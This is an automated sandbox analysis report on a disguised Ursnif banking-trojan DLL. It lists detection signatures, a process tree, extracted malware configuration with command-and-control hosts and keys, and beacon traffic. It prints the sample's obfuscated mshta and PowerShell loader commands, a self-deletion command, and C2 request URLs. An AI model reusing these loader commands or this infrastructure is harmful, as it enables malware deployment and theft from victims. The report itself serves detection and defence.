Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
626a97fea05c8.pdf.dll

Overview

General Information

Sample Name:626a97fea05c8.pdf.dll
Analysis ID:617386
MD5:76f9a5c65f372960c55a3e2d19d211cb
SHA1:341d52557b6600d3e3fe30a43de94206eb4e4403
SHA256:713cfe3bc8dd8f8ba3b907d9268d3f4bd40f5a6a681653cc7922bf69a754ee5a
Tags:dllgozi_ifsbursnif3000
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Execute DLL with spoofed extension
Snort IDS alert for network traffic
Found malware configuration
Sigma detected: Windows Shell File Write to Suspicious Folder
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Sigma detected: Accessing WinAPI in PowerShell. Code Injection
Machine Learning detection for sample
Allocates memory in foreign processes
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Call by Ordinal
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Sigma detected: Suspicious Remote Thread Created
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6592 cmdline: loaddll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6612 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 3340 cmdline: rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 5008 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • explorer.exe (PID: 3688 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
            • cmd.exe (PID: 4920 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\626a97fea05c8.pdf.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • PING.EXE (PID: 6176 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
            • RuntimeBroker.exe (PID: 4504 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
  • mshta.exe (PID: 5140 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Dgvy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dgvy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6636 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 1300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 3120 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3068 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4ECA.tmp" "c:\Users\user\AppData\Local\Temp\pyir2nwc\CSC3492E89F885A4D28ABE1C8363667B7D.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 2268 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vx43imot\vx43imot.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 2140 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6B2B.tmp" "c:\Users\user\AppData\Local\Temp\vx43imot\CSCE0D7D73128344F6AB96E56EC2E032.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "+FflIsIAzGiUM0s27tuLbRAwZqYoqmNsTeF7rxG/Mwp38QqxThLLXpreOfEHBItOJka6enf+5fp9fT9wIfjoNQYondBMg0CXVUaaXZmXPw7dFUCTuwl/1fJ8Te0BDO4/e0D+MT+n6Ovzq2MwCzSIm7W4ZiEEkdm60WNeCsFwnx1f78Cv9j4wv9nLP3bFRx9OkdD66cn4ATsp0wULyGpOtly6uJj4gNSoIxbBBQeCFBEVhnqZ/KZ3/SbtJUJ3X757TgS02V8uV2DJldCmSy1UGDylgn9Cs1EUm4RQgf1fFSmTn7kcnOpsq0753wd2/m9Jbas3/WEwOA88vTsSUvhPp7zr8Ltl9tao4hrJvcTrul8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "hopexmder.net", "94.140.114.144", "94.140.112.49", "94.140.112.121"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, calc no*ad *terminal* *debug*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.424373972.0000000004EC8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000004.00000003.424240322.0000000004EC8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000004.00000003.530255853.0000000005CA8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000004.00000003.475301685.0000000004EC8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000012.00000003.571518194.00000182D98EC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 21 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.rundll32.exe.ef0000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              4.3.rundll32.exe.48e94a0.10.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                4.3.rundll32.exe.48e94a0.10.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  4.3.rundll32.exe.4dca4a0.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    4.3.rundll32.exe.4dca4a0.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 2 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Windows Shell File Write to Suspicious Folder
                      Source: File createdAuthor: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 5140, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Caches
                      Sigma detected: Accessing WinAPI in PowerShell. Code Injection
                      Source: Threat createdAuthor: Nikita Nazarov, oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 6636, StartAddress: 424A1580, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 3688
                      Sigma detected: MSHTA Spawning Windows Shell
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Dgvy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dgvy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5140, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6636, ProcessName: powershell.exe
                      Sigma detected: Suspicious Call by Ordinal
                      Source: Process startedAuthor: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6612, ParentProcessName: cmd.exe, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1, ProcessId: 3340, ProcessName: rundll32.exe
                      Sigma detected: Suspicious Remote Thread Created
                      Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 6636, StartAddress: 424A1580, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 3688
                      Sigma detected: Mshta Spawning Windows Shell
                      Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Dgvy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dgvy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5140, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6636, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6636, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.cmdline, ProcessId: 3120, ProcessName: csc.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Dgvy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dgvy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5140, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6636, ProcessName: powershell.exe
                      Source: Process startedAuthor: frack113: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6636, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 1300, ProcessName: conhost.exe
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6636, TargetFilename: C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.cmdline
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132956597262145556.6636.DefaultAppDomain.powershell

                      Data Obfuscation

                      barindex
                      Sigma detected: Execute DLL with spoofed extension
                      Source: Process startedAuthor: Joe Security: Data: Command: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1, CommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: loaddll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll", ParentImage: C:\Windows\System32\loaddll32.exe, ParentProcessId: 6592, ParentProcessName: loaddll32.exe, ProcessCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1, ProcessId: 6612, ProcessName: cmd.exe

                      Snort Signatures

                      Timestamp:04/28/22-15:48:15.506658 04/28/22-15:48:15.506658
                      SID:2033203
                      Source Port:49745
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/28/22-15:48:37.609595 04/28/22-15:48:37.609595
                      SID:2033203
                      Source Port:49750
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 00000004.00000002.599465657.00000000008E0000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "+FflIsIAzGiUM0s27tuLbRAwZqYoqmNsTeF7rxG/Mwp38QqxThLLXpreOfEHBItOJka6enf+5fp9fT9wIfjoNQYondBMg0CXVUaaXZmXPw7dFUCTuwl/1fJ8Te0BDO4/e0D+MT+n6Ovzq2MwCzSIm7W4ZiEEkdm60WNeCsFwnx1f78Cv9j4wv9nLP3bFRx9OkdD66cn4ATsp0wULyGpOtly6uJj4gNSoIxbBBQeCFBEVhnqZ/KZ3/SbtJUJ3X757TgS02V8uV2DJldCmSy1UGDylgn9Cs1EUm4RQgf1fFSmTn7kcnOpsq0753wd2/m9Jbas3/WEwOA88vTsSUvhPp7zr8Ltl9tao4hrJvcTrul8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "hopexmder.net", "94.140.114.144", "94.140.112.49", "94.140.112.121"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, calc no*ad *terminal* *debug*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
                      Machine Learning detection for sample
                      Source: 626a97fea05c8.pdf.dllJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00EF5FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
                      Source: 626a97fea05c8.pdf.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000004.00000003.534897078.0000000005CC0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.540095400.0000000005D70000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: 626a97fea05c8.pdf.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000004.00000003.534897078.0000000005CC0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.540095400.0000000005D70000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008EFD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008E99BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008FBAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008E65C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 94.140.115.8 80
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49745 -> 13.107.42.16:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49750 -> 94.140.115.8:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49750 -> 94.140.115.8:80
                      Uses ping.exe to check the status of other devices and networks
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: global trafficHTTP traffic detected: GET /drew/LtgGoR4W/2VkXik7fjDcVktkLvg4IApw/X92UzCdVgy/XGxL6WnODxABmAmav/eQYJObhAwpfD/VdmVLoyMEHz/dwiltyOKA4QHrd/HIJmqKTpq7hYAhh7xdD_2/BebjcoubFQh657nc/ksw26clyZ6v7ljU/oLbDPDTt1qYXqZfF_2/Fct2ocSBw/YaWKTOq17vIwu56czhmj/mDU1dku9eqq5aKu5F_2/FjqClysn2ko_2Fsx8SaFZF/ugZkpFnnMo_2B/poGcHSuZrc7hSygj/D8.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 94.140.115.8Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/NiEEiC_2F3/2h7kr_2B2M1EBpHcH/ENyHLalFXmOl/_2FTW0ecUVe/3N7nldlK89kw4y/VYeID7sRLB3A_2FAgFg0G/a5El_2BO7WD36Nlp/el4uE7tHR4Z8M9p/QG4TJaEWODl3HaYCH4/kP01txLgC/1iGXgYXBwcTcIgoIP92G/0JSXT0rNb0xnVvZFyXY/gCk_2F7aTYUhOqcRrdrBn4/EZOQnHcHRUgv3/B5BfYkj9/KpyjZ64W8U3keBpCjw85kZ4/8t_2Bri7RNBUNE3Y/8jsFDn.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 94.140.115.8Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/lAbS1TW8Ry8K_2Fy_2F02/IsWfDHUCh87tGSw4/6lgCxLe1Qs4WPGx/DknDiIGwAkcSSAjTq_/2BfvJx7dx/1hlTGDAg0PRAb8RWrNXa/OnwJqcZ0UkVEA4nNNEX/rU_2BEpbIQ3L_2FTXhvUWT/8ZfWEtxix63AY/iFey05B2/gKLIqEyGvdF_2FQqfOcIngQ/d4nr47OKVK/s16bIA5z3PH2z3706/OF3C_2BAmDzq/p9S3fF0IaVA/8GI4MffuRsVQDp/0oN_2BdvJJV7wESzGZsla/_2FLi.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 94.140.115.8Connection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewASN Name: NANO-ASLV NANO-ASLV
                      Source: rundll32.exe, 00000004.00000002.600414567.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.484931733.0000000000B4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.140.115.8/37
                      Source: rundll32.exe, 00000004.00000002.600414567.0000000000B43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.140.115.8/drew/NiEEiC_2F3/2h7kr_2B2M1EBpHcH/ENyHLalFXmOl/_2FTW0ecUVe/3N7nldlK89kw4y/VYeID7
                      Source: rundll32.exe, 00000004.00000002.600414567.0000000000B43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.140.115.8/drew/lAbS1TW8Ry8K_2Fy_2F02/IsWfDHUCh87tGSw4/6lgCxLe1Qs4WPGx/DknDiIGwAkcSSAjTq_/2
                      Source: rundll32.exe, 00000004.00000003.530255853.0000000005CA8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.571518194.00000182D98EC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000017.00000003.545160730.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000017.00000003.545084241.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                      Source: rundll32.exe, 00000004.00000003.530255853.0000000005CA8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.571518194.00000182D98EC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000017.00000003.545160730.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000017.00000003.545084241.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
